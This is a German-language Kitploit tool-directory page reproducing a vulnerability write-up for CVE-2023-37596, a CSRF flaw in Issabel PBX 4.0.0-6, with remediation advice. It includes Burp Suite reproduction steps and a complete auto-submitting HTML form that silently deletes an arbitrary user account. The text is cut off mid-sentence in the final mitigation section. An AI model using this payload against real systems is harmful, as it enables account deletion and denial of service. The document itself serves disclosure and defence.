Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-37596 — CVE-2023-37596 ist eine Cross-Site-Request-Forgery (CSRF)-Schwachstelle, die in Issabel PBX Version 4.0.0-6 entdeckt wurde, einer weit verbreiteten Open-Source-Unified-Communications-Plattform. | Kitploit
Tools/GitHubGitHub/sahiloj/cve-2023-37596
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubsahiloj/cve-2023-37596

CVE-2023-37596

CVE-2023-37596 ist eine Cross-Site-Request-Forgery (CSRF)-Schwachstelle, die in Issabel PBX Version 4.0.0-6 entdeckt wurde, einer weit verbreiteten Open-Source-Unified-Communications-Plattform.

Repository anzeigen
115vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-37596 — issabel-pbx 4.0.0-6: Cross-Site-Request-Forgery (CSRF) — Beliebigen Benutzer löschen

Schweregrad: Hoch  |  CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H)  |  CWE: CWE-352


Inhaltsverzeichnis

  • Übersicht
  • Schwachstellendetails
  • Auswirkungen
  • Betroffene Version
  • Angriffsszenario
  • Proof of Concept (Schritte zur Reproduktion)
  • Minderung / Behebung
  • Referenzen
  • Offenlegungszeitplan
  • Autor

Übersicht

Eine Cross-Site-Request-Forgery (CSRF)-Schwachstelle wurde in Issabel PBX Version 4.0.0-6 entdeckt. Der Benutzerverwaltungs-Endpunkt implementiert keinen CSRF-Schutz, was es einem nicht authentifizierten entfernten Angreifer ermöglicht, eine bösartige Webseite zu erstellen, die – wenn sie von einem authentifizierten Issabel-Administrator besucht wird – stillschweigend ein beliebiges Benutzerkonto aus dem System löscht. Wiederholte Ausnutzung kann die gesamte Anwendung unzugänglich machen, indem alle administrativen Benutzer entfernt werden.


Schwachstellendetails

FeldWert
CVE-IDCVE-2023-37596
SchwachstellentypCross-Site-Request-Forgery (CSRF)
CWECWE-352
ProduktIssabel PBX
Betroffene Version4.0.0-6
Anbieter-Webseitehttps://www.issabel.org/
Software-Repositoryhttps://github.com/IssabelFoundation/issabelPBX
Getestet aufWindows
CVE veröffentlicht10/07/2023
Entdeckt vonSahil Ojha

Auswirkungen

Da Issabel PBX die Herkunft zustandsändernder Anfragen an die Benutzerverwaltungsschnittstelle nicht überprüft, ermöglicht ein erfolgreicher CSRF-Angriff einem Angreifer:

  • Beliebiges Benutzerkonto löschen – einschließlich des primären Administrators – ohne Wissen des Opfers.
  • Denial-of-Service (DoS) verursachen – durch Entfernen aller Benutzer kann sich niemand mehr anmelden, wodurch das PBX-Administrationspanel vollständig unzugänglich wird.
  • Telefondienste stören – Telefonsystemkonfiguration und -verwaltung sind nicht verfügbar, bis das Konto manuell auf Serverebene wiederhergestellt wird.

Betroffene Version

ProduktBetroffene VersionStatus
issabel-pbx4.0.0-6Verwundbar

Angriffsszenario

Ein Angreifer hostet eine bösartige HTML-Seite, die eine gefälschte HTTP-Anfrage an den Delete-User-Endpunkt der Issabel PBX-Anwendung enthält. Der Angriff wird automatisch (oder durch einen Klick auf einen Button) ausgelöst, wenn ein Benutzer, der bereits in Issabel authentifiziert ist, die bösartige Seite im selben Browser besucht. Da der Browser automatisch die Sitzungscookies des Opfers mit jeder Anfrage sendet, akzeptiert der Server die gefälschte Löschungsanfrage als legitim.

Auf Seiten des Angreifers sind keine besonderen Berechtigungen erforderlich – nur ein Social-Engineering-Vektor (Phishing-Link, bösartige Werbung usw.), um den authentifizierten Administrator zur präparierten Seite zu locken.

Hauptmerkmale dieses Angriffs:

  • Keine Authentifizierung auf Seiten des Angreifers erforderlich.
  • Ein einziger Klick (oder sogar null Klicks, wenn `` / Auto-Submit-Formulare verwendet werden) reicht aus, um den Exploit auszulösen.
  • Jede Benutzer-ID (z. B. id=1, id=2, …) kann durch Anpassen der Payload angegriffen werden.
  • Der Angriff ist für das Opfer unsichtbar; die Seite kann nicht zusammenhängenden Inhalt anzeigen, während sie stillschweigend die gefälschte Anfrage sendet.

Proof of Concept (Schritte zur Reproduktion)

Voraussetzungen

  • Burp Suite (Community oder Professional Edition)
  • Ein Browser, der so konfiguriert ist, dass er den Traffic über Burp Suite leitet
  • Eine im Netzwerk erreichbare Issabel PBX 4.0.0-6-Instanz

Schritt 1 — Als Administrator anmelden

Navigieren Sie zur Issabel PBX-Benutzerliste und authentifizieren Sie sich mit Administrator-Anmeldedaten:

https://<Issabel-IP>/index.php?menu=userlist

Schritt 1 — Issabel PBX Benutzerliste


Schritt 2 — Delete-User-Anfrage in Burp Suite erfassen

  1. Klicken Sie bei aktivem Burp Suite-Proxy auf die Schaltfläche Löschen neben dem Zielbenutzer.
  2. Suchen Sie im Proxy → HTTP-Verlauf von Burp Suite die erfasste DELETE/POST-Anfrage.
  3. Klicken Sie mit der rechten Maustaste auf die Anfrage und wählen Sie Engagement Tools → Generate CSRF PoC.

Schritt 2 — Löschungsanfrage in Burp Suite erfassen


Schritt 3 — CSRF-Exploit generieren und speichern

Burp Suite erstellt eine HTML-Seite, die der folgenden ähnelt. Speichern Sie sie als .html-Datei (z. B. csrf_exploit.html):

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Auto-submit the form as soon as the page loads
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Hinweis: Ersetzen Sie <Issabel-IP> durch die IP-Adresse oder den Hostnamen des Zielservers und passen Sie den id-Wert an, um ein anderes Benutzerkonto anzugreifen.


Schritt 4 — Den Exploit an den authentifizierten Administrator übermitteln

Senden Sie die csrf_exploit.html-Datei (oder einen Link zu der Stelle, an der sie gehostet wird) an einen Benutzer, der derzeit in Issabel PBX angemeldet ist. Wenn das Opfer die Seite öffnet, wird das Formular automatisch gesendet und der Zielbenutzer ohne Bestätigungsaufforderung gelöscht.

Schritt 4 — CSRF-Exploit ausgeführt, Benutzer gelöscht

Schritt 4 — Bestätigung, dass der Benutzer entfernt wurde


Minderung / Behebung

Die folgenden Abwehrmaßnahmen sollten vom Anbieter und/oder den Systemadministratoren ergriffen werden, um diese Schwachstelle zu beheben:

  1. CSRF-Tokens implementieren — Generieren Sie ein kryptographisch zufälliges, sitzungs- (oder anfragen-) spezifisches Token und validieren Sie es serverseitig für jede zustandsändernde Anfrage. Anfragen ohne gültiges Token müssen abgewiesen werden.

  2. SameSite-Cookie-Attribut — Setzen Sie das SameSite-Attribut des Sitzungscookies auf Strict oder Lax, um zu verhindern, dass das Sitzungscookie in den meisten Browsern bei Cross-Origin-Anfragen mitgesendet wird.

  3. Origin-/Referer-Header überprüfen — Lehnen Sie serverseitig jede zustandsändernde Anfrage ab, deren Origin- oder Referer-Header nicht mit der eigenen Domain der Anwendung übereinstimmt.

  4. Erneute Authentifizierung für destruktive Aktionen verlangen — Fordern Sie den Benutzer auf, sein Passwort erneut einzugeben, bevor irreversible Aktionen wie das Löschen von Benutzerkonten verarbeitet werden.

  5. Prinzip der geringsten Privilegien anwenden — Stellen Sie sicher, dass nur Benutzer mit expliziter Administratorrolle auf die Benutzerlöschfunktion zugreifen können, um die Auswirkung eines erfolgreichen Angriffs zu verringern.

Bis ein Hersteller-Patch verfügbar ist, wird Administratoren Folgendes empfohlen:

Tool herunterladen